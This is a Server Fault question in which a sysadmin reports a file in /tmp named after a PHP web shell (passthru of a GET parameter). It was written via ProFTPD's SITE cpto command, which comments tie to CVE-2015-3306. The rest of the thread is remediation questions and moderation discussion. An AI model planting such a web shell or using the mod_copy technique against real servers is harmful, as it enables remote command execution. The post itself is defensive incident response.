
I just found a file in the /tmp/ directory named .<?php passthru($_GET['cmd']);echo 'm3rg3';?>

Owner and group owner are "proftpd" and "nogroup", respectively, as follows:

-rw-r--r-- 1 proftpd nogroup   89 Apr  9 01:15 .<?php passthru($_GET['cmd']);echo 'm3rg3';?>

FILE CONTENT

proftpd: 45.33.17.183:39686: SITE cpto /tmp/.<?php passthru($_GET['cmd']);echo 'm3rg3';?>

QUESTIONS

  1. How could one break into my server through ProFTPD?
  2. What can I do to fix this issue?
  3. What else should I look for after this finding?
  4. Is there a default password for the user "proftpd"?
  5. Can I find the "proftpd" password?
  6. In the "/tmp/" directory I see this file .<?php passthru($_GET['cmd']);echo 'm3rg3';?> which is owned by "proftpd". Does it imply that someone successfully logged in through FTP and uploaded that file there? Is there another way that it happened?
  7. How can I find the hole that allowed this to happen?

MEASURES TAKEN SO FAR

  1. Changed ProFTPD port from 21 to something else;

  2. Commented out mod_copy.c as suggested on this Russian site: http://blog.foxylab.com/popytka-vzloma-moego-servera-cherez-uyazvimost-v-proftpd/

  3. Moved the injected file from /tmp/ to another directory, e.g. /tmp/injected_file/

  4. Didn't change ANY password (note: ftp is not used on this server).

  5. Searched for all files from user proftpd using find / -user proftpd. Nothing was found, besides the one file mentioned in the beginning.

Rafael Vidal
  • It's a specific question with specific details, @MadHatter – Rafael Vidal May 06 '16 at 05:41
  • Indeed it is; but the linked duplicate is a [canonical question](http://meta.serverfault.com/questions/1986/what-are-the-canonical-answers-weve-discovered-over-the-years). These exist specifically to provide general answers to a family of questions; I recommend you follow the link for more information. – MadHatter May 06 '16 at 05:45
  • I have read that and many other similar questions, but none of them helped. Then, I asked this question, because someone may have this specific answer, @MadHatter – Rafael Vidal May 06 '16 at 06:17
  • My personal feeling is that your need doesn't supersede our logic in having canonical questions; as the explanation says, although everyone's particular problems in that class are somewhat different, to the extent that they are interesting, they aren't different, and to the extent that they're different, they aren't interesting **to anyone save the questioner**. However, I have acted unilaterally; you should escalate this to meta if you want a community ruling. Although I don't think your question is good, I have upvoted it, so you now have enough rep to post to meta and ask, if you want to. – MadHatter May 06 '16 at 06:23
  • Q1, Q6, Q7: [CVE-2015-3306](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3306) - Q4, Q7 service accounts under linux typically have no valid password (or rather `!` or `*` in `/etc/shadow` which will never make a valid password hash match) – HBruijn May 06 '16 at 12:39
  • Ok, @MadHatter, I have to agree with you. Before our conversation I did indeed think of questioning Meta about this "moderation mania", which makes users edit answers/questions, suggest moves, mark as duplicate etc., just for reputation, a sort of competition. But I, admittedly, didn't reflect on the "canonical question" idea. I just thought that if every question is a duplicate, then there is no question, and then no reason for a stackoverflow.com. Simplistic thinking, although pertinent. By the way, why do you think my question isn't good? Do you think I should be more specific? – Rafael Vidal May 07 '16 at 21:48
  • @RafaelVidal I should say I'm speaking only for myself, here, not quoting policy. Like most of the high-rep users here, I sysadmin professionally; the essence of SF for me is that I can help **more than one person** with what I write. I lose one answer's-worth of time, but **many** people save themselves that time; it is a net gain to humanity, which justifies my taking bread from my own mouth. You have an issue the details of which are so specific that the answer won't help anyone but you, and the generalities of which have already been answered. Hire a professional. – MadHatter May 08 '16 at 08:26
  • I should also warn you against taking up arms against the idea that we "*edit answer/question, suggest to move, mark as duplicate etc, just for reputation, a sort of competition*". High-rep users don't generate rep for any of the activities that you have listed; we do these "housekeeping" tasks for the love of the site, to try to keep it relevant and useful. – MadHatter May 08 '16 at 08:30

0 Answers